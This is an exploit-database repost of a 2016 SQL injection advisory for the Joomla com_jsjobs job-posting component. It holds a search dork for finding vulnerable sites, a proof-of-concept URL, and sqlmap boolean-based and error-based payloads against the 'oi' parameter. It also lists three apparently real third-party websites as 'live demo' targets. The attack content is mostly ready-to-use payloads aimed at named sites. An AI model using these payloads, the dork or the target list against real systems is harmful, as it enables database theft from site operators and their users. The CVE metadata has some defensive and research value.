Advertisement






Joomla com_jsjobs SQL injection Vulnerability

CVE Category Price Severity
CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2016-08-31
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016080270

Below is a copy:

Joomla com_jsjobs SQL injection Vulnerability|
!! Exploit Title : Joomla com_jsjobs SQL injection Vulnerability
!! Exploit Author : xBADGIRL21
!! Dork : inurl:index.php?option=com_jsjobs
!! Vendor Homepage : http://www.joomsky.com
!! MyBlog : http://xbadgirl21.blogspot.com/
!! version : 1.0.7.5
!! Tested on: [ BackBox]
!! skype:xbadgirl21
!! Date: 31/08/2016
!! video Proof : https://youtu.be/ZBphlyFtNeo
|
!! [] DESCRIPTION :   
|
!! [+] Jsjobs is A component for job posting and resume submission.
!! [+] AND an SQL injection has been Detected in this Joomla components jsjobs
|
!! [] Poc :          !!
|
!! [oi] Get Parameter Vulnerable To SQLi
!! http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680'
|
!! [] SQLmap PoC :    
|
!! 
!! Parameter: oi (GET)
!! [!] Type: boolean-based blind
!! [!] Title: AND boolean-based blind - WHERE or HAVING clause
!! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND 3616=3616&Itemid=0&lang=en
!! [!]
!! [!] Type: error-based
!! [!] Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
!! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND (SELECT 2727 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,
!! [!] (SELECT (ELT(2727=2727,1))),0x71627a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=0&lang=en
!!++++++++++++++++++++++
!!  GET parameter 'oi' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
|
!! [] Live Demo :     
|
!! http://dev.selectmyjob.lu/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680&Itemid=0&lang=en
!! http://job.gastrobaiter.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=list_subcategoryjobs&jobsubcat=279&Itemid=55&sortby=salaryrangedesc
!! http://www.cultunet.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=job_searchresults&Itemid=1&sortby=companydesc&lang=es
|
!! [] Solution        
|
!! Just Update to the Last Version {Test In Progress}
|
!! [] Discovered by : xBADGIRL21
!! [] Greetz : All Mauritanien Hackers - NoWhere
|


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum